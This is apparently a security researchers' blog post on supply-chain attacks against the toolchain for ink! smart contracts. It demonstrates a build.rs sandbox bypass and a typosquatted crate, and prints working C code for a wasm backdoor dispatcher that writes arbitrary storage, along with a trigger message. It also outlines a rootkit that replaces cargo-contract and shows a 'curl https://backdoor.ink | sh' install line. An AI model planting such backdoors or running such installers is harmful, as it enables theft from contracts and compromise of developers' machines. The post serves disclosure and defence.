ink! Smart Contracts lower the entry barrier for anyone who wants to write smart contracts in the Polkadot ecosystem. It is all very well explained here but in a nutshell, it is something like this:
You typically write code in the domain-specific language ink! (built on top of Rust).
High-level code gets compiled to wasm.
wasm relies on imported methods provided by the environment.
The wasm module must export 2 methods: call and deploy. After deployment, all messages sent to that contract will be processed by call.
It all starts with a
$ cargo install cargo-contracts
and it is a supply chain hell.
A supply chain hell
It is very well studied and accepted that downloading and installing a dependency package is essentially trusting its publisher to run code on your machine.
The toolchains and dependencies installed are jointly responsible for ultimately generating what the programmer imagined the resultant software should be. This works out well most of the time because programmers write irrelevant code. Or code that is not responsible for handling several millions in assets. The game and incentives change radically when there is much more at stake. Let's go through some of the critical points we think could be overtaken by an external attacker via a supply chain attack.
There is no lack of bad crate maintainers,
what is missing are investors. NineQueens
A quick inspection of the dependencies imported into the most rudimentary ink! contract, the flipper, reveals a significant number of contributors. As of the time of writing, there are 197 individuals (+48 GitHub teams) that can publish updates to the dependencies used in this contract. See the awesome cargo-supply-chain tool to generate such reports for your other projects.
TL;DR It is about trust…
ink! itself
In ink! there is a great effort to put rails on what the smart contract writer can do. This is done via a set of macros and tooling provided by cargo-contract. The team behind it is highly trustworthy, with aligned intentions, and it is rather unlikely that they would shoot themselves in the foot by backdooring the main repo.
Who controls it: github:paritytech:core-devs
What can be controlled by it: Everything
The Rust compiler
We simply trust compilers to death and there is little effort put into educating programmers about tools to validate the compiled result. Check out Compiler Explorer if you have not: here. For starters, the most common installation process for Rust depends on running a shell script with super powers.
$ curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
This is well accepted, but it is also incredibly easy to replace with something else. There are no secret crypto signing meetings, long and complicated web3 proposals or any of that. It is someone controlling a good old web2 server and/or TLS cert. It may involve more steps, but you get the point.
He who controls curl or static.rust-lang.org (or sudo or bash for that matter) controls your smart contracts (and potentially everything that your computer does from now onwards).
There are 2 notable mentions about trust deposited in compilers and this does not necessarily rely on a bad actor planting some backdoor. It is all under the brand WYSINWYX.
The old one, a compiler optimization removes a NULL pointer check from a Linux kernel enabling an exploit: here
The web3 one, the Vyper compiler lied about adding a reentrancy check for months, resulting in several contracts being deployed without the expected check and ultimately being exploited for millions: here
Who controls it: The guy that has .rust-lang.org dns (example)
What can be controlled by it: Everything
The Cargo Dependencies, Crates!
A crate is the smallest amount of code that the Rust compiler considers at a time.
A crate can come in one of two forms: a binary crate or a library crate. Binary crates are programs you can compile to an executable that you can run, such as a command-line program or a server. Each must have a function called main that defines what happens when the executable runs.
Library crates don’t have a main function, and they don’t compile to an executable. Instead, they define functionality intended to be shared with multiple projects.
No matter which flavor you choose, whether you install a binary crate or add a library crate to a project, you are trusting its admin to run arbitrary code on your behalf. And this code is going to be run at rather unexpected times.
A very thin sandbox
Let's check out exactly how this is done. We present to you build.rs. This is part of standard Rust and it is explained in the book. In essence, running
$ cargo build
will run all the random build.rs scripts provided by crates and dependencies. You allow all your dependencies to run arbitrary code on your behalf at installation time. This is also automatically run by IDEs like VSCode and it is one of the reasons you are regularly asked if you “trust this repo”. Good time to remember we are in the business of “less trust more truth”.
build.rs is supposed to modify files only inside a specific part of the filesystem, configured by the environment variable OUT_DIR. If the build.rs script goes outside that, an error message is printed out, or is it? Here is the code responsible for doing the check. This code does not actually check too much and any process spawned from build.rs can easily bypass this restriction. You can try this from a fresh Rust project like this:
$ cargo new build-rs-sandbox-bypass
That creates a fresh empty helloworld-like rust project:
fn main() {
    println!("Hello, world!");
}
Now add your build.rs file in the project root directory:
+-- build-rs-sandbox-bypass/
+-- src/
| +-- main.rs
+-- Cargo.toml
+-- build.rs <----- Create this file
// build.rs
use std::process::Command;

fn main() {
    // Spawn an external process that writes outside OUT_DIR.
    let _ = Command::new("touch")
        .arg("/tmp/test.txt")
        .output()
        .expect("failed to execute process");
}
Now let Cargo.toml know about your new build.rs file:
[package]
name = "build-rs-sandbox-bypass"
version = "0.1.0"
edition = "2021"
build = "build.rs" # Optional: Cargo picks up a build.rs in the package root by default
[dependencies]
Now, executing cargo run should build the project and run the main function, just printing "Hello, world!" in the terminal. But our planted build.rs file also created the /tmp/test.txt file unexpectedly. That does not seem too bad but it gets worse.
Who controls it: The person who uploaded the crate to crates.io.
What can be controlled by it: The computer, all the other projects around it, all the information that goes through it. Yes. Digest it. (Actually, everything that can be done on behalf of the developer, i.e. not necessarily root.)
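As a rough first step toward knowing which dependencies get to run code at build time, the sketch below walks a directory tree and lists every file named build.rs. It assumes the dependency sources are available on disk (for instance in a directory produced by cargo vendor); the function name find_build_scripts is made up for this example. It only catches the default file name, so crates that point the build key in Cargo.toml at another file, and procedural macros, are not covered.

```rust
use std::fs;
use std::io;
use std::path::{Path, PathBuf};

/// Recursively collect every file named `build.rs` under `root`.
/// Symlinked directories are not followed.
fn find_build_scripts(root: &Path) -> io::Result<Vec<PathBuf>> {
    let mut found = Vec::new();
    let mut pending = vec![root.to_path_buf()];
    while let Some(dir) = pending.pop() {
        for entry in fs::read_dir(&dir)? {
            let entry = entry?;
            let file_type = entry.file_type()?;
            let path = entry.path();
            if file_type.is_dir() {
                pending.push(path);
            } else if file_type.is_file() && entry.file_name() == "build.rs" {
                found.push(path);
            }
        }
    }
    found.sort();
    Ok(found)
}

fn main() -> io::Result<()> {
    // The directory to scan is passed as the first argument (an assumption of this sketch).
    match std::env::args().nth(1) {
        Some(root) => {
            for script in find_build_scripts(Path::new(&root))? {
                println!("{}", script.display());
            }
        }
        None => eprintln!("usage: pass the directory that holds the dependency sources"),
    }
    Ok(())
}
```

Every path it prints is a script that cargo build will execute with your privileges, so each one deserves a read before the first build.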
Typosquatting cargo-contract
If you were reading closely you may have noticed an extra S in the suggested line at the beginning of the post. Here it is again, can you spot it?
$ cargo install cargo-contracts
This is a fake crate that exists only to prove to you that ANY dependency you add to any of your multiple Rust projects in any part of your filesystem can take full control of your computer. Cosmic rays can flip a bit in your memory and redirect your dependency to something else but more likely just a typo can mess you up. If you run that line you are owned. The next steps involve the usual forensic analysis, the destruction of your current laptop and the acquisition of a new one. Happy times!
Watch it again. Just by installing cargo-contracts, we are modifying the original cargo-contract behavior by adding a WARNING legend.
An ink! Backdoor
One of the best ways to grasp what is required for an external attacker to hijack your contract is to put yourself in their position. We are interested in the technical aspect; we assume that with enough incentives bad actors will find a way to persuade, bribe or extort people with the power to change the items from your Bill Of Materials. Let's go full evil and see what can be done to your contract from a crate gone wild.
The Life of an ink! message
Sending a successful message to a contract is a somewhat complex task if you look closely enough. The process starts with the execution of an extrinsic named call() within the context of Polkadot.js. Using SCALE, the input is encoded according to the ABI configured with the contract.
Once the wasm contract code is executed it calls input() to retrieve a buffer containing all input data. Normally something like: SELECTOR+SCALE(ARGS). Subsequently, the wasm module checks the selector, and if it aligns with one of the contract's compiled methods, a get_storage operation is triggered to fetch the smart contract storage into memory. Lots of SCALE encodings and decodings are applied to allow data to go "through the wires" or to be stored.
By default, the smart contract data resides in the storage slot 0x00000000, and it is loaded to memory at the beginning of the execution. If the execution proves successful and modifies the memory version of the storage, the final step calls set_storage to ensure that the data is written back to the contract storage. Until this juncture, all modifications occurred solely in memory. To conclude the process, a function named seal_return is invoked.
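To make the SELECTOR+SCALE(ARGS) shape concrete, here is a minimal sketch that builds such a buffer by hand and splits it again the way a dispatcher would. The selector value and the (u32, bool) argument list are hypothetical; real ink! selectors are derived from the message name and real contracts use a SCALE codec library rather than hand-rolled encoding. The sketch relies only on two SCALE rules: fixed-width integers are little-endian and a bool is a single byte.

```rust
/// Hypothetical 4-byte selector, used only for illustration.
const EXAMPLE_SELECTOR: [u8; 4] = [0xDE, 0xAD, 0xBE, 0xEF];

/// Build SELECTOR + SCALE(ARGS) for a made-up message taking (u32, bool).
fn encode_message(selector: [u8; 4], amount: u32, flag: bool) -> Vec<u8> {
    let mut out = Vec::with_capacity(9);
    out.extend_from_slice(&selector);
    out.extend_from_slice(&amount.to_le_bytes()); // fixed-width ints: little-endian
    out.push(flag as u8); // bool: one byte, 0x00 or 0x01
    out
}

/// Split the raw input into the selector and the still-encoded arguments.
fn split_selector(input: &[u8]) -> Option<([u8; 4], &[u8])> {
    if input.len() < 4 {
        return None;
    }
    let (head, rest) = input.split_at(4);
    let mut selector = [0u8; 4];
    selector.copy_from_slice(head);
    Some((selector, rest))
}

fn main() {
    let input = encode_message(EXAMPLE_SELECTOR, 42, true);
    let (selector, args) = split_selector(&input).expect("input shorter than a selector");
    println!("selector = {:02x?}, args = {:02x?}", selector, args);
}
```

The point to notice is that the contract sees nothing but raw bytes: whatever code runs first inside call() gets to interpret them before the generated ink! dispatcher does.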
The backdoored dispatcher
This is a trivial backdoor that allows setting values in arbitrary storage slots. The basic attack could be to take snapshots of the storage and then replay them later when it is convenient.
The target contract call() is renamed to inner_call() in the implantation process. The backdoor_dispatcher acts as a guard and will call the payload only when certain conditions are met.
void call()
{
    backdoor_dispatcher();
    inner_call();
}
This backdoor_dispatcher is hooked and prepended to the normal ink! smart contract entry point. backdoor_dispatcher will interject itself at the beginning of the execution flow before the normal message dispatching of the infected contract.
The added code at backdoor_dispatcher will decide over an arbitrary condition (e.g. the message starts with AAAA) if the backdoor payload must be executed or not. Otherwise, the control is sent back to the original contract. Simple.
This imports the externally provided host functions, syscalls or hypercalls.
extern void input(void *value, int *value_size_ptr);
extern int set_storage(void *key, int key_size, void *value, int value_size);
extern void seal_return(int, void *result, int result_size);
extern void inner_call();
Here the attacker just needs to send AAAA at the beginning of the message. However, other more complex scenarios can be implemented, e.g. using unused bits, signing special messages, steganography, etc.
void backdoor_dispatcher()
{
    // Use the stack as a buffer for the input.
    // It is unwound (freed) when we return from backdoor_dispatcher.
    char buffer[16384];
    int size_input = sizeof(buffer);
    char *ptr = buffer;
    input(buffer, &size_input);
    // Message layout: "AAAA" | key_size | key | value_size | value
    if (*((int *)ptr) == 0x41414141)
    {
        unsigned key_size = *(int *)(ptr + 4);
        void *key_ptr = ptr + 8;
        unsigned value_size = *(int *)(ptr + 8 + key_size);
        void *value_ptr = ptr + 8 + key_size + 4; // the value follows its 4-byte size
        int ret = set_storage(key_ptr, key_size, value_ptr, value_size);
        seal_return(0, &ret, 4);
    }
}
To set the value 01 in the storage slot 00000000, send a message that looks like this: 4141414101000000000000000100000000
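For experimenting with the dispatcher, the sketch below builds a trigger message following the field order the C listing reads: the AAAA magic, a 4-byte key length, the key, a 4-byte value length, then the value. It assumes little-endian 32-bit lengths (what a wasm32 build of that C code would read) and a 4-byte key for slot 00000000; the helper names are made up here. Because the bytes are derived purely from that reading of the listing, they may not match the hex string quoted in the post byte for byte.

```rust
/// Build "AAAA" | key_len (u32 LE) | key | value_len (u32 LE) | value.
fn backdoor_message(key: &[u8], value: &[u8]) -> Vec<u8> {
    let mut msg = Vec::with_capacity(12 + key.len() + value.len());
    msg.extend_from_slice(b"AAAA"); // 0x41414141, the trigger checked by the dispatcher
    msg.extend_from_slice(&(key.len() as u32).to_le_bytes());
    msg.extend_from_slice(key);
    msg.extend_from_slice(&(value.len() as u32).to_le_bytes());
    msg.extend_from_slice(value);
    msg
}

/// Lowercase hex rendering, convenient for pasting into a call.
fn to_hex(bytes: &[u8]) -> String {
    bytes.iter().map(|b| format!("{b:02x}")).collect()
}

fn main() {
    // Assumed example: write the single byte 01 into the 4-byte slot 00000000.
    let msg = backdoor_message(&[0, 0, 0, 0], &[0x01]);
    println!("{}", to_hex(&msg));
}
```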
ink!Backdoor to ink!Rootkit
Ok so we have a way to obtain execution in the builder's computer and we have a way to add a wasm level backdoor to any created ink! smart contract. This is knowingly borderline just wrong but given the number of times we run cargo build a day we are set to drive it further. We want you to be alert when running your next cargo build. Let's make a full ink! rootkit. This will demonstrate that after adding a dependency into any Rust project, all ink! contracts generated from your system after that will contain a backdoor.
Yes, you add a dependency to Project A and the results in Project B change.
Let it sink in.
Here is a simple way to plant a rootkit so every ink! smart contract compiled in the future is backdoored.
Make a backup copy of the cargo-contract binary into cargo-backup
Replace cargo-contract with some arbitrary Python.
Control all cargo-contract commands
You can install it like this on your friend's laptop:
$ curl https://backdoor.ink | sh
Nah, that is too much. We tested something like that and it works. Please be careful of what you install. Check out the demo.
Demo
Conclusions/Takeaways!
It is very hard to generate ink! smart contracts (and perhaps substrate runtimes) in a trustless fashion having so many moving parts.
Developers are warned against blindly installing dependencies, as a compromised dependency can have far-reaching consequences. Remain vigilant, conduct thorough code reviews, and implement security measures to mitigate the risks associated with supply chain attacks.
We think that a low-level analysis and reverse engineering of the resultant artifacts is a must for very high-stake contracts.
We like the trustless solution. This proposal is more of a mitigation and involves using tools to read low-level representations of your contract. Checking the low-level generated code before you release it has all the same problems. You will be using untrusted software to read and analyze it. It just adds an extra layer and makes it more annoying for the attacker to effectively hijack the tooling in your critical path.
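As a small taste of what reading the low-level artifact can look like, the sketch below parses just enough of the WebAssembly binary format to list a module's exported names, using nothing but the standard library. It follows the published binary layout (8-byte header, then sections with a one-byte id and a LEB128 size; the export section has id 7). The function names are made up for this example, and the parser is deliberately minimal. Note that a backdoor like the one above keeps the same exports, so this is only a starting point for a review, not a detector.

```rust
/// Read an unsigned LEB128 u32 starting at `*pos`, advancing `*pos`.
fn read_leb_u32(bytes: &[u8], pos: &mut usize) -> Option<u32> {
    let mut result: u32 = 0;
    let mut shift = 0;
    loop {
        let byte = *bytes.get(*pos)?;
        *pos += 1;
        result |= ((byte & 0x7f) as u32) << shift;
        if byte & 0x80 == 0 {
            return Some(result);
        }
        shift += 7;
        if shift >= 35 {
            return None; // more than 5 bytes cannot encode a u32
        }
    }
}

/// Names listed in the export section, or None if the bytes are not a well-formed module prefix.
fn exported_names(wasm: &[u8]) -> Option<Vec<String>> {
    if wasm.len() < 8 || &wasm[0..4] != b"\0asm" {
        return None;
    }
    let mut pos = 8; // skip magic and version
    while pos < wasm.len() {
        let id = wasm[pos];
        pos += 1;
        let size = read_leb_u32(wasm, &mut pos)? as usize;
        let end = pos.checked_add(size)?;
        if end > wasm.len() {
            return None;
        }
        if id == 7 {
            let mut names = Vec::new();
            let count = read_leb_u32(wasm, &mut pos)?;
            for _ in 0..count {
                let len = read_leb_u32(wasm, &mut pos)? as usize;
                let name = wasm.get(pos..pos.checked_add(len)?)?;
                names.push(String::from_utf8_lossy(name).into_owned());
                pos += len;
                pos += 1; // export kind (function, table, memory, global)
                read_leb_u32(wasm, &mut pos)?; // index of the exported item
            }
            return Some(names);
        }
        pos = end; // not the export section: skip it
    }
    Some(Vec::new())
}

fn main() -> std::io::Result<()> {
    // The path to the contract's .wasm file is passed as the first argument.
    match std::env::args().nth(1) {
        Some(path) => match exported_names(&std::fs::read(&path)?) {
            Some(names) => println!("exports: {names:?}"),
            None => eprintln!("{path} does not look like a wasm module"),
        },
        None => eprintln!("usage: pass the path to a .wasm file"),
    }
    Ok(())
}
```

For an ink! contract you would expect to see call and deploy in the output; anything beyond that is worth a closer look, and the function bodies behind those two names are where the real reverse engineering starts.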
A word on determinism.
Deterministic compilation is a hot topic when building artifacts that will later participate in some distributed consensus system. Everybody involved must be able to regenerate the same low-level code from the same high-level code. This has been proven to be annoying with Rust in general. Developers rely on sharing containers where they can trust the compilation will be identical no matter where they are. This simply pushes all the same problems we showed here inside the container. And also adds several new angles involving Dockerfiles and Dockerhub. More on this soon, maybe.
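When two parties do rebuild the same contract independently, the comparison itself is simple. The sketch below reports the first byte offset at which two artifacts differ, which is a handy starting point for a disassembly diff. The file paths are whatever the two builds produced, and the function names are made up for this example; it says nothing about which of the two builds, if either, is the honest one.

```rust
use std::fs;
use std::io;
use std::path::Path;

/// Offset of the first differing byte, or None when both slices are identical.
/// If one slice is a strict prefix of the other, the offset is the shorter length.
fn first_difference(a: &[u8], b: &[u8]) -> Option<usize> {
    match a.iter().zip(b).position(|(x, y)| x != y) {
        Some(offset) => Some(offset),
        None if a.len() != b.len() => Some(a.len().min(b.len())),
        None => None,
    }
}

/// Read both files fully and compare them byte by byte.
fn compare_artifacts(left: &Path, right: &Path) -> io::Result<Option<usize>> {
    Ok(first_difference(&fs::read(left)?, &fs::read(right)?))
}

fn main() -> io::Result<()> {
    let args: Vec<String> = std::env::args().collect();
    if args.len() != 3 {
        eprintln!("usage: pass two .wasm files built from the same source");
        return Ok(());
    }
    match compare_artifacts(Path::new(&args[1]), Path::new(&args[2]))? {
        None => println!("artifacts are byte-for-byte identical"),
        Some(offset) => println!("artifacts differ at byte offset {offset}"),
    }
    Ok(())
}
```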
Next…
What about main substrate runtimes and parachains?